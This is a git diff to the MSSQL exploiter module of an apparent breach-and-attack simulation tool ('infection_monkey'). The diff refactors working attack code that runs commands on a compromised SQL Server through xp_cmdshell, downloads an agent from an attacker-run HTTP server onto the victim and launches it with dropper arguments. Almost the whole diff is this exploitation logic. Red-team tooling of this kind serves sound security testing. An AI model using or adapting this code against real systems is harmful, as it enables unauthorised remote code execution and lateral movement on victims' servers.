diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 1827a5281..75c369ecf 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -28,10 +28,6 @@ class MSSQLExploiter(HostExploiter): QUERY_BUFFER = 0.5 SQL_DEFAULT_TCP_PORT = "1433" - # Temporary file that saves commands for monkey's download and execution. - TMP_FILE_NAME = "tmp_monkey.bat" - TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir" - # Single quotes are escaped in SQL by using two of them. # Example: 'It ain''t over ''til it''s over' AGENT_DOWNLOAD_COMMAND = ( @@ -43,7 +39,6 @@ class MSSQLExploiter(HostExploiter): super().__init__() self.cursor = None self.agent_http_path = None - self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME def _exploit_host(self) -> ExploiterResultData: agent_path_on_victim = get_agent_dst_path(self.host) @@ -67,10 +62,8 @@ class MSSQLExploiter(HostExploiter): return self.exploit_result try: - self._create_temp_dir() self._upload_agent(agent_path_on_victim) self._run_agent(agent_path_on_victim) - self._remove_temp_dir() except Exception as e: error_message = ( f"An unexpected error occurred when trying " @@ -145,17 +138,10 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) - def _create_temp_dir(self): - logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}") - - mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}" - self._run_mssql_command(mkdir_command) - def _upload_agent(self, agent_path_on_victim: PureWindowsPath): http_thread = self._start_agent_server(agent_path_on_victim) - self._write_download_command_to_batch_file(agent_path_on_victim) - self.run_payload_file() + self._run_agent_download_command(agent_path_on_victim) MSSQLExploiter._stop_agent_server(http_thread) @@ -165,39 +151,30 @@ class MSSQLExploiter(HostExploiter): ) return http_thread + def _run_agent_download_command(self, agent_path_on_victim: PureWindowsPath): + agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format( + http_path=self.agent_http_path, dst_path=str(agent_path_on_victim) + ) + self._run_mssql_command(agent_download_command) + + def _run_mssql_command(self, command: str): + sql_server_command = f"xp_cmdshell '{command}'" + + logger.debug(f"Running command on SQL Server: {sql_server_command}") + + self.cursor.execute(sql_server_command) + self.add_executed_cmd(command) + + sleep(MSSQLExploiter.QUERY_BUFFER) + @staticmethod def _stop_agent_server(http_thread: LockedHTTPServer): http_thread.stop() http_thread.join(LONG_REQUEST_TIMEOUT) - def _write_download_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath): - agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format( - http_path=self.agent_http_path, dst_path=str(agent_path_on_victim) - ) - self._write_command_to_batch_file(agent_download_command) - - def _write_command_to_batch_file(self, command: str): - write_to_file_command = f"{self.payload_file_path}" - self._run_mssql_command(write_to_file_command) - - def _run_mssql_command(self, command: str): - logger.debug(f"Running command on SQL Server: {command}") - - self.cursor.execute(f"xp_cmdshell '{command}'") - self.add_executed_cmd(command) - - sleep(MSSQLExploiter.QUERY_BUFFER) - - def run_payload_file(self): - self._run_mssql_command(str(self.payload_file_path)) - def _run_agent(self, agent_path_on_victim: PureWindowsPath): - self._write_agent_launch_command_to_batch_file(agent_path_on_victim) - self.run_payload_file() - - def _write_agent_launch_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath): agent_launch_command = self._build_agent_launch_command(agent_path_on_victim) - self._write_command_to_batch_file(agent_launch_command) + self._run_mssql_command(agent_launch_command) def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str: agent_args = build_monkey_commandline( @@ -205,7 +182,3 @@ class MSSQLExploiter(HostExploiter): ) return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}" - - def _remove_temp_dir(self): - self._run_mssql_command(f"del {self.payload_file_path}") - self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}")